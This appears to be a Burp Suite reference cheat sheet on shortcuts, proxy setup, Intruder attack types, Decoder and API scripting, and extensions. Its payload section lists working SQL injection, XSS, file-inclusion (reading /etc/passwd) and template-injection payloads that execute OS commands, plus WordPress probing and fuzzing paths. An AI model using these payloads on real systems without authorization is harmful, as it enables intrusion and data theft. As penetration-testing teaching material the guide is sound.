1. Keyboard Shortcuts
Global Shortcuts
Shortcut       Action
Ctrl+Shift+D   Switch to Dashboard
Ctrl+Shift+T   Switch to Target
Ctrl+Shift+P   Switch to Proxy
Ctrl+Shift+I   Switch to Intruder
Ctrl+Shift+R   Switch to Repeater
Ctrl+Shift+O   Switch to Organizer
Ctrl+Shift+E   Switch to Extender
Ctrl+,         Open Burp Suite preferences
Proxy Shortcuts
Shortcut   Action
Ctrl+I     Toggle interception on/off
Ctrl+F     Forward intercepted request
Ctrl+D     Drop intercepted request
Ctrl+A     Select all
Ctrl+L     Go to URL in browser
Ctrl+R     Send to Repeater
Ctrl+T     Send to Intruder
Ctrl+S     Send to Scanner (Professional)
Repeater Shortcuts
Shortcut     Action
Ctrl+Space   Send request
Ctrl+Enter   Send request
Ctrl+/       Go to previous request
Ctrl+.       Go to next request
Ctrl+U       URL encode selection
2. Proxy Usage
Basic Configuration
Configure proxy listener:
  Proxy > Proxy Settings > Add
  Binding: 127.0.0.1:8080 (default)
  Enable “Running” checkbox
Configure browser proxy settings:
  HTTP proxy: 127.0.0.1
  Port: 8080
  Or install “FoxyProxy” extension
Install Burp CA certificate in browser:
  Navigate to http://burp
  Download CA certificate
  Import into browser’s trusted certificates
Intercepting Requests
Enable interception: Proxy > Intercept > “Intercept is on”
Actions with intercepted requests:
  Modify headers, parameters, or body content
  Forward: Send request to server
  Drop: Discard request
  Action > Send to other Burp tools
Request History
View all requests in Proxy > HTTP History
Filter requests by domain, file type, status code, etc.
Right-click to send to other Burp tools
Match and Replace
Proxy > Options > Match and Replace
Automatically modify requests/responses based on regex patterns
3. Intruder Attack Types
Sniper
Tests each position individually with payloads
Positions: 3, Payloads: 10 = 30 requests
Best for: Testing single vulnerabilities across multiple positions
POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§password§
Battering Ram
Uses same payload in all defined positions simultaneously
Positions: 3, Payloads: 10 = 10 requests
Best for: Testing when same input is needed in multiple fields
POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§admin§
Pitchfork
Uses different payload sets for different positions
Each position gets its corresponding payload
Positions: 3, Payloads per set: 10 = 10 requests
Best for: Testing with related data (username+password pairs)
POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§
Cluster Bomb
Tests all combinations of payloads
Positions: 3, Payloads per set: 10 = 1,000 requests
Best for: Brute force attacks (username + password combinations)
POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§
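The four attack types differ only in how they walk the payload sets, so the request counts quoted above follow directly from each enumeration rule. The Python below is an added example written for this cheat sheet, not code from Burp or from the original page: it reproduces the enumeration on a constructed request template that uses the same paired § markers as the Intruder UI, so an attack can be sized (and rate-limited) before it is run. The function names, the template and the payload lists are all assumptions made for the example.

```python
from itertools import product

# Added example, not Burp's own code: enumerate the requests each Intruder
# attack type produces from a template whose payload positions are marked
# with paired § characters, the notation the Intruder UI uses.

def split_template(template):
    """Split a template on § markers.

    Returns a list of (kind, text) pairs, kind being "lit" for literal text or
    "pos" for a payload position; for a position, text is its default value."""
    parts = template.split("§")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced § markers in template")
    return [("pos" if i % 2 else "lit", text) for i, text in enumerate(parts)]

def render(pieces, values):
    """Fill the positions in order; a None value keeps the position's default."""
    out, idx = [], 0
    for kind, text in pieces:
        if kind == "pos":
            out.append(text if values[idx] is None else values[idx])
            idx += 1
        else:
            out.append(text)
    return "".join(out)

def intruder_requests(template, attack_type, payload_sets):
    """Yield every request the given attack type would send.

    payload_sets is a list of payload lists: one list for sniper and battering
    ram, one list per position for pitchfork and cluster bomb."""
    pieces = split_template(template)
    n_pos = sum(1 for kind, _ in pieces if kind == "pos")
    if attack_type == "sniper":
        # One set; each position is tested on its own, the others keep defaults
        (payloads,) = payload_sets
        for pos in range(n_pos):
            for p in payloads:
                values = [None] * n_pos
                values[pos] = p
                yield render(pieces, values)
    elif attack_type == "battering_ram":
        # One set; the same payload is placed in every position at once
        (payloads,) = payload_sets
        for p in payloads:
            yield render(pieces, [p] * n_pos)
    elif attack_type == "pitchfork":
        # One set per position, walked in parallel; stops with the shortest set
        if len(payload_sets) != n_pos:
            raise ValueError("pitchfork needs one payload set per position")
        for values in zip(*payload_sets):
            yield render(pieces, list(values))
    elif attack_type == "cluster_bomb":
        # One set per position; every combination (cartesian product)
        if len(payload_sets) != n_pos:
            raise ValueError("cluster bomb needs one payload set per position")
        for values in product(*payload_sets):
            yield render(pieces, list(values))
    else:
        raise ValueError(f"unknown attack type: {attack_type}")

def request_count(template, attack_type, payload_sets):
    """Number of requests the attack would send; use it to size the attack."""
    return sum(1 for _ in intruder_requests(template, attack_type, payload_sets))

if __name__ == "__main__":
    # Constructed template with three positions and a 10-item payload set,
    # matching the counts quoted for each attack type above.
    template = ("GET /items?id=§1§&sort=§asc§&page=§1§ HTTP/1.1\r\n"
                "Host: example.com\r\n\r\n")
    payloads = [str(i) for i in range(10)]
    for attack in ("sniper", "battering_ram"):
        print(attack, request_count(template, attack, [payloads]))
    for attack in ("pitchfork", "cluster_bomb"):
        print(attack, request_count(template, attack, [payloads] * 3))
```

With three positions and ten payloads the script prints 30, 10, 10 and 1000, the figures given for the four attack types. Note the pitchfork rule: like Burp, it stops when the shortest payload set is exhausted, so mismatched set lengths silently shorten the attack.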
4. Common Payloads for Attacks
SQL Injection Payloads
' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --
XSS Payloads
<script>alert('XSS')</script>
<img src="x" onerror="alert('XSS')">
<svg onload="alert('XSS')">
<body onload="alert('XSS')">
javascript:alert('XSS')
';alert('XSS');//
"><script>alert('XSS')</script>
LFI Payloads
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
/proc/self/environ
/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/etc/passwd
SSTI (Server-Side Template Injection) Payloads
${7*7}
{{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
WordPress-Specific Payloads
/wp-login.php
/wp-admin
/wp-content/uploads/
/wp-content/plugins/
/wp-config.php.bak
/wp-config.php~
/?author=1
Fuzzing Payloads
# Path discovery
/admin
/backup
/config
/dev
/.git/HEAD
# File extensions
.bak
.old
.swp
.txt
.zip
.tar.gz
# WordPress files
wp-config.php
wp-content/debug.log
wp-content/uploads/
5. Repeater & Decoder Usage
Repeater
Send intercepted requests to Repeater: Right-click > Send to Repeater
Modify request and click “Send” to resend
View side-by-side request and response
Use multiple tabs for comparing responses
Right-click > Change request method (GET/POST)
Decoder
Select text and right-click > Send to Decoder (or Ctrl+Shift+D)
Encoding options:
  URL: Convert special characters to %XX format
  HTML: Convert characters to HTML entities
  Base64: Encode/decode as Base64
  ASCII Hex: Convert to/from hexadecimal
  Hex: Raw binary data as hexadecimal
  Gzip: Compress/decompress using gzip
  Deflate: Compress/decompress using deflate
Chained encoding/decoding:
  “Encode as…” applies the encoding
  “Decode as…” attempts to decode
  Multiple encodings can be applied sequentially
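As an added illustration of how the Decoder's chained transforms compose (example code written for this page, not Burp's implementation), the Python below applies the listed encodings in order on raw bytes, reverses the same list to decode, and includes a small smart_decode that peels one guessed layer at a time, in the spirit of the Decoder's "Smart decode" option. The transform names, the detection heuristics and the sample strings are assumptions of the example. One difference from Burp: its URL and HTML options encode only key characters by default, whereas this example URL-encodes every byte outside the unreserved set.

```python
import base64
import binascii
import gzip
import html
import re
import urllib.parse
import zlib

# Added example, not Burp's code. Every transform takes and returns bytes so
# the steps can be chained in any order, as in the Decoder tab.
ENCODERS = {
    "url": lambda b: urllib.parse.quote(b, safe="").encode("ascii"),
    "html": lambda b: html.escape(b.decode("utf-8"), quote=True).encode("utf-8"),
    "base64": base64.b64encode,
    "ascii_hex": binascii.hexlify,
    "gzip": gzip.compress,
    "deflate": zlib.compress,
}
DECODERS = {
    "url": urllib.parse.unquote_to_bytes,
    "html": lambda b: html.unescape(b.decode("utf-8")).encode("utf-8"),
    "base64": base64.b64decode,
    "ascii_hex": binascii.unhexlify,
    "gzip": gzip.decompress,
    "deflate": zlib.decompress,
}

def encode_chain(data, steps):
    """Apply the named encodings left to right, e.g. ["html", "url", "base64"]."""
    for step in steps:
        data = ENCODERS[step](data)
    return data

def decode_chain(data, steps):
    """Undo encode_chain: the same step list, applied in reverse order."""
    for step in reversed(steps):
        data = DECODERS[step](data)
    return data

def _looks_like(name, data):
    """Heuristic check that data is the output of the named encoder."""
    if name == "gzip":
        return data[:2] == b"\x1f\x8b"
    if name == "deflate":
        # zlib header: CMF byte 0x78 and (CMF*256 + FLG) divisible by 31
        return len(data) >= 2 and data[0] == 0x78 and (data[0] * 256 + data[1]) % 31 == 0
    if name == "ascii_hex":
        return len(data) >= 2 and len(data) % 2 == 0 and re.fullmatch(rb"[0-9A-Fa-f]+", data) is not None
    if name == "base64":
        return len(data) >= 4 and len(data) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", data) is not None
    if name == "url":
        return re.search(rb"%[0-9A-Fa-f]{2}", data) is not None
    if name == "html":
        return re.search(rb"&(#[0-9]+|#x[0-9A-Fa-f]+|[A-Za-z]+);", data) is not None
    return False

def smart_decode(data, max_layers=8):
    """Peel encoding layers one at a time, like the Decoder's "Smart decode".

    Returns (decoded_bytes, [layers removed, outermost first]). Ambiguous input
    (a hex string is also valid base64) is resolved by the order tried below."""
    layers = []
    for _ in range(max_layers):
        for name in ("gzip", "deflate", "ascii_hex", "base64", "url", "html"):
            if _looks_like(name, data):
                try:
                    data = DECODERS[name](data)
                except (ValueError, zlib.error, OSError, UnicodeDecodeError):
                    continue  # detection was wrong; try the next candidate
                layers.append(name)
                break
        else:
            break  # nothing matched: no more layers to remove
    return data, layers

if __name__ == "__main__":
    sample = b"name=Bob <Smith> & co"  # constructed input
    wrapped = encode_chain(sample, ["html", "url", "base64"])
    print(wrapped)
    print(decode_chain(wrapped, ["html", "url", "base64"]))
    print(smart_decode(encode_chain(b"role=admin", ["base64", "ascii_hex"])))
```

Running it prints the triple-encoded sample, its round-trip back to the original bytes, and `(b'role=admin', ['ascii_hex', 'base64'])` for the double-encoded value, showing the layers being removed outermost first. The gzip output differs between runs (it carries a timestamp), so it is checked only by round trip.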
6. Automating with Burp Suite API
Python Script for Sending Requests Through Burp Proxy
import requests

# Burp Proxy settings: route both schemes through the local listener
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Custom headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}

# Burp terminates TLS with its own CA, so certificate verification fails unless
# that CA is trusted. verify=False is the quick route (hence silencing the
# warning below); the safer route is to pass the exported Burp CA certificate,
# e.g. verify="burp-ca.pem", which keeps verification on.
requests.packages.urllib3.disable_warnings()

# GET request through Burp
def send_get(url):
    response = requests.get(
        url,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# POST request through Burp
def send_post(url, data):
    response = requests.post(
        url,
        data=data,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# Example usage
target = "https://example.com/login"
login_data = {
    "username": "admin",
    "password": "password123"
}
response = send_post(target, login_data)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
Using Burp REST API (Professional)
import requests
import json

# Burp Suite Professional REST API settings. The API is enabled in Burp's
# settings (REST API) and listens on port 1337 by default. If an API key is
# configured, Burp expects it as a path segment in front of the versioned
# endpoint (/v0.1/...), not in an Authorization header.
api_key = "your_api_key_here"
api_base = f"http://127.0.0.1:1337/{api_key}/v0.1"
headers = {
    "Content-Type": "application/json"
}

# Create a new scan. Burp answers 201 Created with an empty body and returns
# the new task ID in the Location header.
def create_scan(target_url):
    payload = {
        "scan_configurations": [
            {"type": "NamedConfiguration", "name": "Default"}
        ],
        "urls": [target_url]
    }
    response = requests.post(
        f"{api_base}/scan",
        headers=headers,
        data=json.dumps(payload)
    )
    response.raise_for_status()
    return response.headers["Location"]

# Get scan status and metrics for a task
def get_scan_status(task_id):
    response = requests.get(
        f"{api_base}/scan/{task_id}",
        headers=headers
    )
    response.raise_for_status()
    return response.json()

# Example usage
task_id = create_scan("https://example.com")
print(f"Created scan task with ID: {task_id}")
status = get_scan_status(task_id)
print(f"Scan status: {status['scan_status']}")
7. Popular Burp Extensions
Essential Extensions
Extension          Description
Logger++           Advanced logging of requests and responses
Autorize           Authorization enforcement testing
Turbo Intruder     Fast intruder with custom attack scripting
Active Scan++      Extends active scanning capabilities
CSRF Scanner       Detects Cross-Site Request Forgery vulnerabilities
JWT Editor         Testing and manipulating JSON Web Tokens
JSON Beautifier    Pretty-prints and validates JSON content
Retire.js          Identifies vulnerable JavaScript libraries
Param Miner        Parameter mining for hidden attack surfaces
WordPress Scanner  Specific scanner for WordPress vulnerabilities
Installing Extensions
Extender > BApp Store
Browse or search for extensions
Click “Install” button
View loaded extensions under Extender > Extensions
WordPress-Specific Extensions
WP Plugin Scanner: Enumerates and tests WordPress plugins
WP Scanner Integration: Integrates WPScan results
CMS Scanner: Detects WordPress and plugin versions
8. Tips for Optimizing Burp Suite Performance
Memory Management
Increase Java heap size:
  Burp > Project options > Misc > Java Environment
  Maximum memory allocation: 2048 MB (adjust based on RAM)
Speed Optimization
Use target scope to limit requests:
  Target > Scope > Include in scope
  Project options > Scope > URL Scope
Enable “Use smart scan settings” in Scanner
Disable logging for file types:
  Proxy > Options > Intercept Client Requests
  Disable for: .jpg$|.gif$|.png$|.css$|.js$
Efficient Workflows
Use Burp project files to save/restore state
Create and use saved scan configurations
Use match/replace rules for repetitive changes
Create macros for multi-step authentication
Resource Saving
Disable passive scanning if not needed
Configure response interception strategically
Set up strict scoping for large applications
Use Intruder’s “Number of threads” wisely (20-50 is often optimal)
WordPress-Specific Optimizations
Add WordPress admin paths to scope
Create scan profiles specific to WordPress vulnerabilities
Use match/replace rules to add WordPress authentication cookies automatically